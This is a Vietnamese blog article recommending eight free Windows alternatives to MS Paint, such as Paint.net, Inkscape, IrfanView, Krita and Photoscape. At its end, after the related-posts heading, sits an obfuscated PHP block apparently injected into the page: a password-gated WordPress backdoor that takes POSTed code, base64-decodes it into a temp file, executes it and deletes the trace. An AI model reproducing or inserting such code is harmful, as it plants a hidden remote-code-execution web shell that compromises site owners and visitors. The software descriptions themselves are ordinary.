Top 8 các phần mềm thay thế Paint trên Windows

Paint hay còn gọi là MS Paint là phần mềm mặc định trên Windows có từ những hệ điều hành đầu tiên, theo thời gian những phiên bản Windows mới xuất hiện nhưng hầu như paint không có nhiều cải tiến, thay đổi đáng chú ý.  Đơn giản, dễ sử dụng là những ưu điểm vượt trội tuy nhiên nếu không có paint bạn sẽ chỉnh sửa hình ảnh bằng những công cụ nào? Xem ngay về top các phần mềm thay thế Paint.

Top 8 các phần mềm thay thế Paint trên Windows-1

Các phần mềm thay thế Paint

My Paint

Top 8 các phần mềm thay thế Paint trên Windows-2

Thiết kế đơn giản, dễ sử dụng tuy nhiên so với Ms Paint phần mềm này vẫn rắc rối hơn. Một số tính năng đáng chú ý cần quan tâm đó là cung cấp nhiều công cụ giúp tạo ra các bản vẽ chuyên nghiệp hơn. Đây là phần mềm thay thế paint trên windows cực tốt mà bạn nên sử dụng.

Paint.net 

Top 8 các phần mềm thay thế Paint trên Windows-3

Mục đích ban đầu của paint.net là dùng thay thế cho Paint của Windows tuy nhiên phần mềm này đã phát triển với nhiều tính năng nổi trội như:

– Giao diện trực quan.

– Hỗ trợ làm việc theo lớp.

– Paint.net có cộng đồng trực tuyến.

– Tích hợp nhiều công cụ tiện ích.

– Cung cấp thêm rất nhiều các hiệu ứng đặc biệt chỉnh hình ảnh nâng cao rất đáng chú ý.

Ứng dụng này cũng tương tự như Adobe Photoshop hoặc Corel Paint Shop Pro rất nhiều các tiện ích, sử dụng chỉnh sửa ảnh và ghép ảnh, hiệu ứng đẹp và có khả năng làm nhiều loại file hình ảnh.

Xem Thêm  Cách thêm IDM vào Chrome, Cốc Cốc, Firefox tải video

Inkscape

Top 8 các phần mềm thay thế Paint trên Windows-4

Inkscape nổi tiếng là phần mềm chỉnh sửa hình ảnh chuyên nghiệp thường được dùng để thay thế cho Adobe Illustrator.

Tính năng hữu ích:

– Chỉnh sửa hình ảnh bằng tạo ra các bản vẻ bằng vector đồ họa.

– Rất nhiều các hiệu ứng thiết kế bản vẽ.

– Quản lý bản vẽ theo các lớp.

– Có thể xuất bản vẽ ra nhiều định dạng khác nhau.

Inkscape có nhiều phiên bản và tương thích với các hệ điều hành phổ biến nhất hiện tại như Windows, Mac OS và Linux.

 Artweaver

Artweaver phần mềm chỉnh sửa hình ảnh chuyên nghiệp thích hợp cho cả những người có bản và những người dùng chuyên nghiệp.

Top 8 các phần mềm thay thế Paint trên Windows-5

Với phiên bản miễn phí chỉ cần tải về và sử dụng không tốn phí nếu sử dụng bản nâng cao bạn sẽ có những tính năng vượt trội hơn tuy nhiên với bản miễn phí đã đủ thay thế cho ms paint trong Windows.

Những tính năng nổi bật:

– Hỗ trợ nhiều định dạng file JPEG, BMP, GIF, PCX, TGA, TIFF, PNG, PSD.

– Transparency, layers và layer groups.

– Công cụ chỉnh sửa hình ảnh: gradient, crop, fill và selection.

– Có nhiều bộ lọc hiệu ứng.

– Chỉnh sửa các text layers.

– Hỗ trợ nhiều ngôn ngữ, hệ điều hành khác nhau.

IrfanView

IrfanView có các tính năng như xem và xử lý ảnh đáp ứng nhu cầu xem ảnh của con người. Phần mềm IrfanView còn có các tính năng khác như là chỉnh màu sắc, đổi size ảnh, chỉnh sửa ảnh bằng paint, đổi đuôi ảnh, xem ảnh động GIF.

Xem Thêm  4 cách vào facebook khi bị chặn thành công 100%, update mới nhất

Top 8 các phần mềm thay thế Paint trên Windows-6

IrfanView hỗ trợ gần như tất cả các định dạng file ảnh và video. Với người mới có thể dùng giao diện với chất lượng tốt nhất. Ngoài ra phần mềm này còn có khả năng trình chiếu silde ảnh, trình chiếu thuyết trình hoặc làm các chương trình mà vẫn đảm bảo hiệu suất.

Một số tính năng cơ bản bạn cần nên biết:

– Trình chiếu định dạng hình ảnh thông thường và cơ bản: JPG, JPEG, BMP, GIF…

– Chuyển đổi các định dạng ảnh (đuôi ảnh).

– Trình chiếu slideshow.

– Chèn văn bản, thêm vào file ảnh.

Tính năng IrfanView tương tự như là ứng dụng Microsoft Paint cơ bản, nếu càn thao tác nhanh mà không có paint có thể dùng phần mềm này. Ngoài ra còn nhiều tính năng nâng cấp hơn mà Paint không có.

Pinta

Pinta là phần mềm chỉnh sửa ảnh mã nguồn mở, miễn phí giúp các bạn thao tác cơ bản như chỉnh sửa hình ảnh, thao tác biên tập như thêm xóa text, hình ảnh…Trong trường hợp các bạn đang tìm kiếm phầm mềm biên tập và làm đẹp ảnh thì Pinta rất phù hợp.

Top 8 các phần mềm thay thế Paint trên Windows-7

Pinta dựa trên Paint.NET nên các bạn sẽ không mất thời gian làm quen với công cụ này. Với hơn 35 hiệu ứng cùng công cụ vẽ chắc chắn đây là lựa chọn thay thế Paint mà bạn không nên bỏ qua khi thao tác trên Windows.

Krita

Krita được nhiều người biết đến là phần mềm vẽ tranh miễn phí nhưng lại chuyên nghiệp đến đáng kinh ngạc. Ngoài chỉnh sửa cơ bản phần mềm này còn hiệu ứng trực quan (VFX), thiết kế đồ họa, hay dùng các thao tác tạo ra một bức tranh đẹp dành cho bạn.

Xem Thêm  Cách tra số điện thoại của người khác đơn giản

Top 8 các phần mềm thay thế Paint trên Windows-8

Một số tính năng bạn cần biết về Krita:

Hỗ trợ nhiều công cụ đồ họa mành (raster graphics) và đồ họa vector.

Khung vẽ: thao tác như xoay hoặc đối xứng. T

Vẽ tranh: cung cấp thêm các công cụ chổi cọ. Các chổi cọ khác như là smudge brush, filter brush, hairy brush, chalk…

Hỗ trợ docker: bảng màu và có các khối cơ bản.

Hỗ trợ layer với vô số các tùy chỉnh thiết lập đơn giản như tạo độ trong suốt, chọn mask trong bức tranh.

Hỗ trợ nhiều bộ lọc: nhiều bộ lọc tiên tiến giúp cho bức tranh của bạn thêm đẹp.

Photoscape

Photoscape cũng là phần mềm  chỉnh sửa, cắt ghép, tạo ảnh động trên máy tính. Với công cụ này bạn có thểchỉnh sửa ảnh, ghép ảnh, thêm hiệu ứng, thêm văn bản, đổi màu sắc, cân bằng ánh sáng, giúp cho những bức ảnh trở nên độc đáo hơn.

Top 8 các phần mềm thay thế Paint trên Windows-9

PhotoScape rõ ràng là phần mềm chỉnh sửa ảnh hoàn toàn miễn phí với những tính năng cơ bản và nâng cấp dành cho người dùng thoải mái tạo ra những tác phẩm thú vị nhất.

Nếu như sử dụng Ms Paint không đáp ứng được nhu cầu hãy sử dụng những phần mềm thay thế Paint trên Windows bên trên, chắc chắn bạn sẽ hài lòng với các tính năng của phần mềm.

Bài Liên Quan:

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}